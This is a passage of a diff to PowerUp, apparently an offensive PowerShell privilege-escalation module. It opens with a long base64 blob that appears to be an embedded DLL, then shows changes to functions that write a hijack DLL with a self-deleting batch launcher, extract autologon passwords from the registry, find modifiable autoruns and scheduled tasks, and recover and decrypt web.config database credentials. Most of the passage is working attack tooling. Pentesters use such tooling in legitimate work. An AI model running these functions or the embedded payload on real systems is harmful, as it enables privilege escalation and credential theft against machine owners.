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" - if($PSBoundParameters['Architecture']) { + if ($PSBoundParameters['Architecture']) { $TargetArchitecture = $Architecture } - elseif($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') { + elseif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') { $TargetArchitecture = 'x64' } else { $TargetArchitecture = 'x86' } - if($TargetArchitecture -eq 'x64') { + if ($TargetArchitecture -eq 'x64') { [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes64) } else { [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32) } - if($PSBoundParameters['BatPath']) { + if ($PSBoundParameters['BatPath']) { $TargetBatPath = $BatPath } else { @@ -2673,7 +3380,6 @@ function Write-HijackDll { 'start /b "" cmd /c del "%~f0"&exit /b' | Out-File -Encoding ASCII -Append $TargetBatPath Write-Verbose ".bat launcher written to: $TargetBatPath" - Set-Content -Value $DllBytes -Encoding Byte -Path $DllPath Write-Verbose "$TargetArchitecture DLL Hijacker written to: $DllPath" @@ -2682,6 +3388,7 @@ function Write-HijackDll { $Out | Add-Member Noteproperty 'Architecture' $TargetArchitecture $Out | Add-Member Noteproperty 'BatLauncherPath' $TargetBatPath $Out | Add-Member Noteproperty 'Command' $BatCommand + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL') $Out } @@ -2694,90 +3401,110 @@ function Write-HijackDll { function Get-RegistryAlwaysInstallElevated { <# - .SYNOPSIS +.SYNOPSIS + +Checks if any of the AlwaysInstallElevated registry keys are set. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated +or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys +are set, $False otherwise. If one of these keys are set, then all .MSI files run with +elevated permissions, regardless of current user permissions. - Checks if any of the AlwaysInstallElevated registry keys are set. +.EXAMPLE - .DESCRIPTION +Get-RegistryAlwaysInstallElevated - Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated - or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys - are set, $False otherwise. If one of these keys are set, then all .MSI files run with - elevated permissions, regardless of current user permissions. +Returns $True if any of the AlwaysInstallElevated registry keys are set. - .EXAMPLE +.OUTPUTS - PS C:\> Get-RegistryAlwaysInstallElevated +System.Boolean - Returns $True if any of the AlwaysInstallElevated registry keys are set. +$True if RegistryAlwaysInstallElevated is set, $False otherwise. #> + [OutputType('System.Boolean')] [CmdletBinding()] Param() $OrigError = $ErrorActionPreference - $ErrorActionPreference = "SilentlyContinue" + $ErrorActionPreference = 'SilentlyContinue' - if (Test-Path "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer") { + if (Test-Path 'HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer') { - $HKLMval = (Get-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue) + $HKLMval = (Get-ItemProperty -Path 'HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue) Write-Verbose "HKLMval: $($HKLMval.AlwaysInstallElevated)" if ($HKLMval.AlwaysInstallElevated -and ($HKLMval.AlwaysInstallElevated -ne 0)){ - $HKCUval = (Get-ItemProperty -Path "HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue) + $HKCUval = (Get-ItemProperty -Path 'HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -ErrorAction SilentlyContinue) Write-Verbose "HKCUval: $($HKCUval.AlwaysInstallElevated)" if ($HKCUval.AlwaysInstallElevated -and ($HKCUval.AlwaysInstallElevated -ne 0)){ - Write-Verbose "AlwaysInstallElevated enabled on this machine!" + Write-Verbose 'AlwaysInstallElevated enabled on this machine!' $True } else{ - Write-Verbose "AlwaysInstallElevated not enabled on this machine." + Write-Verbose 'AlwaysInstallElevated not enabled on this machine.' $False } } else{ - Write-Verbose "AlwaysInstallElevated not enabled on this machine." + Write-Verbose 'AlwaysInstallElevated not enabled on this machine.' $False } } else{ - Write-Verbose "HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer does not exist" + Write-Verbose 'HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer does not exist' $False } - $ErrorActionPreference = $OrigError } function Get-RegistryAutoLogon { <# - .SYNOPSIS +.SYNOPSIS + +Finds any autologon credentials left in the registry. - Finds any autologon credentials left in the registry. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - .DESCRIPTION +.DESCRIPTION + +Checks if any autologon accounts/credentials are set in a number of registry locations. +If they are, the credentials are extracted and returned as a custom PSObject. + +.EXAMPLE - Checks if any autologon accounts/credentials are set in a number of registry locations. - If they are, the credentials are extracted and returned as a custom PSObject. +Get-RegistryAutoLogon - .EXAMPLE +Finds any autologon credentials left in the registry. - PS C:\> Get-RegistryAutoLogon +.OUTPUTS - Finds any autologon credentials left in the registry. +PowerUp.RegistryAutoLogon - .LINK +Custom PSObject containing autologin credentials found in the registry. - https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb +.LINK + +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb #> + [OutputType('PowerUp.RegistryAutoLogon')] [CmdletBinding()] Param() $AutoAdminLogon = $(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -ErrorAction SilentlyContinue) - Write-Verbose "AutoAdminLogon key: $($AutoAdminLogon.AutoAdminLogon)" if ($AutoAdminLogon -and ($AutoAdminLogon.AutoAdminLogon -ne 0)) { @@ -2797,6 +3524,7 @@ function Get-RegistryAutoLogon { $Out | Add-Member Noteproperty 'AltDefaultDomainName' $AltDefaultDomainName $Out | Add-Member Noteproperty 'AltDefaultUserName' $AltDefaultUserName $Out | Add-Member Noteproperty 'AltDefaultPassword' $AltDefaultPassword + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.RegistryAutoLogon') $Out } } @@ -2804,24 +3532,36 @@ function Get-RegistryAutoLogon { function Get-ModifiableRegistryAutoRun { <# - .SYNOPSIS +.SYNOPSIS - Returns any elevated system autoruns in which the current user can - modify part of the path string. +Returns any elevated system autoruns in which the current user can +modify part of the path string. - .DESCRIPTION +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath - Enumerates a number of autorun specifications in HKLM and filters any - autoruns through Get-ModifiablePath, returning any file/config locations - in the found path strings that the current user can modify. +.DESCRIPTION + +Enumerates a number of autorun specifications in HKLM and filters any +autoruns through Get-ModifiablePath, returning any file/config locations +in the found path strings that the current user can modify. + +.EXAMPLE - .EXAMPLE +Get-ModifiableRegistryAutoRun - PS C:\> Get-ModifiableRegistryAutoRun +Return vulneable autorun binaries (or associated configs). - Return vulneable autorun binaries (or associated configs). +.OUTPUTS + +PowerUp.ModifiableRegistryAutoRun + +Custom PSObject containing results. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.ModifiableRegistryAutoRun')] [CmdletBinding()] Param() @@ -2852,6 +3592,8 @@ function Get-ModifiableRegistryAutoRun { $Out | Add-Member Noteproperty 'Key' "$ParentPath\$Name" $Out | Add-Member Noteproperty 'Path' $Path $Out | Add-Member Noteproperty 'ModifiableFile' $_ + $Out | Add-Member Aliasproperty Name Key + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableRegistryAutoRun') $Out } } @@ -2869,25 +3611,37 @@ function Get-ModifiableRegistryAutoRun { function Get-ModifiableScheduledTaskFile { <# - .SYNOPSIS +.SYNOPSIS - Returns scheduled tasks where the current user can modify any file - in the associated task action string. +Returns scheduled tasks where the current user can modify any file +in the associated task action string. - .DESCRIPTION +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath - Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks" - and parses the XML specification for each task, extracting the command triggers. - Each trigger string is filtered through Get-ModifiablePath, returning any file/config - locations in the found path strings that the current user can modify. +.DESCRIPTION + +Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks" +and parses the XML specification for each task, extracting the command triggers. +Each trigger string is filtered through Get-ModifiablePath, returning any file/config +locations in the found path strings that the current user can modify. + +.EXAMPLE - .EXAMPLE +Get-ModifiableScheduledTaskFile - PS C:\> Get-ModifiableScheduledTaskFile +Return scheduled tasks with modifiable command strings. - Return scheduled tasks with modifiable command strings. +.OUTPUTS + +PowerUp.ModifiableScheduledTaskFile + +Custom PSObject containing results. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.ModifiableScheduledTaskFile')] [CmdletBinding()] Param() @@ -2901,7 +3655,7 @@ function Get-ModifiableScheduledTaskFile { try { $TaskName = $_.Name $TaskXML = [xml] (Get-Content $_.FullName) - if($TaskXML.Task.Triggers) { + if ($TaskXML.Task.Triggers) { $TaskTrigger = $TaskXML.Task.Triggers.OuterXML @@ -2911,6 +3665,8 @@ function Get-ModifiableScheduledTaskFile { $Out | Add-Member Noteproperty 'TaskName' $TaskName $Out | Add-Member Noteproperty 'TaskFilePath' $_ $Out | Add-Member Noteproperty 'TaskTrigger' $TaskTrigger + $Out | Add-Member Aliasproperty Name TaskName + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableScheduledTaskFile') $Out } @@ -2920,6 +3676,8 @@ function Get-ModifiableScheduledTaskFile { $Out | Add-Member Noteproperty 'TaskName' $TaskName $Out | Add-Member Noteproperty 'TaskFilePath' $_ $Out | Add-Member Noteproperty 'TaskTrigger' $TaskTrigger + $Out | Add-Member Aliasproperty Name TaskName + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableScheduledTaskFile') $Out } } @@ -2928,29 +3686,43 @@ function Get-ModifiableScheduledTaskFile { Write-Verbose "Error: $_" } } - $ErrorActionPreference = $OrigError } function Get-UnattendedInstallFile { <# - .SYNOPSIS +.SYNOPSIS + +Checks several locations for remaining unattended installation files, +which may have deployment credentials. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.EXAMPLE + +Get-UnattendedInstallFile - Checks several locations for remaining unattended installation files, - which may have deployment credentials. +Finds any remaining unattended installation files. - .EXAMPLE +.LINK - PS C:\> Get-UnattendedInstallFile +http://www.fuzzysecurity.com/tutorials/16.html - Finds any remaining unattended installation files. +.OUTPUTS - .LINK +PowerUp.UnattendedInstallFile - http://www.fuzzysecurity.com/tutorials/16.html +Custom PSObject containing results. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.UnattendedInstallFile')] + [CmdletBinding()] + Param() + $OrigError = $ErrorActionPreference $ErrorActionPreference = "SilentlyContinue" @@ -2969,6 +3741,8 @@ function Get-UnattendedInstallFile { $SearchLocations | Where-Object { Test-Path $_ } | ForEach-Object { $Out = New-Object PSObject $Out | Add-Member Noteproperty 'UnattendPath' $_ + $Out | Add-Member Aliasproperty Name UnattendPath + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UnattendedInstallFile') $Out } @@ -2978,74 +3752,89 @@ function Get-UnattendedInstallFile { function Get-WebConfig { <# - .SYNOPSIS +.SYNOPSIS + +This script will recover cleartext and encrypted connection strings from all web.config +files on the system. Also, it will decrypt them if needed. + +Author: Scott Sutherland, Antti Rantasaari +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This script will identify all of the web.config files on the system and recover the +connection strings used to support authentication to backend databases. If needed, the +script will also decrypt the connection strings on the fly. The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. - This script will recover cleartext and encrypted connection strings from all web.config - files on the system. Also, it will decrypt them if needed. +.EXAMPLE + +Return a list of cleartext and decrypted connect strings from web.config files. - Author: Scott Sutherland - 2014, NetSPI - Author: Antti Rantasaari - 2014, NetSPI +Get-WebConfig - .DESCRIPTION +user : s1admin +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\test2 +path : C:\test2\web.config +encr : No - This script will identify all of the web.config files on the system and recover the - connection strings used to support authentication to backend databases. If needed, the - script will also decrypt the connection strings on the fly. The output supports the - pipeline which can be used to convert all of the results into a pretty table by piping - to format-table. +user : s1user +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\inetpub\wwwroot +path : C:\inetpub\wwwroot\web.config +encr : Yes - .EXAMPLE +.EXAMPLE - Return a list of cleartext and decrypted connect strings from web.config files. +Return a list of clear text and decrypted connect strings from web.config files. - PS C:\> Get-WebConfig - user : s1admin - pass : s1password - dbserv : 192.168.1.103\server1 - vdir : C:\test2 - path : C:\test2\web.config - encr : No +Get-WebConfig | Format-Table -Autosize - user : s1user - pass : s1password - dbserv : 192.168.1.103\server1 - vdir : C:\inetpub\wwwroot - path : C:\inetpub\wwwroot\web.config - encr : Yes +user pass dbserv vdir path encr +---- ---- ------ ---- ---- ---- +s1admin s1password 192.168.1.101\server1 C:\App1 C:\App1\web.config No +s1user s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\test\web.config No +s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\web.config Yes +s3user s3password 192.168.1.103\server3 D:\App3 D:\App3\web.config No - .EXAMPLE +.OUTPUTS - Return a list of clear text and decrypted connect strings from web.config files. +System.Boolean - PS C:\>get-webconfig | Format-Table -Autosize +System.Data.DataTable - user pass dbserv vdir path encr - ---- ---- ------ ---- ---- ---- - s1admin s1password 192.168.1.101\server1 C:\App1 C:\App1\web.config No - s1user s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No - s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\test\web.config No - s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\web.config Yes - s3user s3password 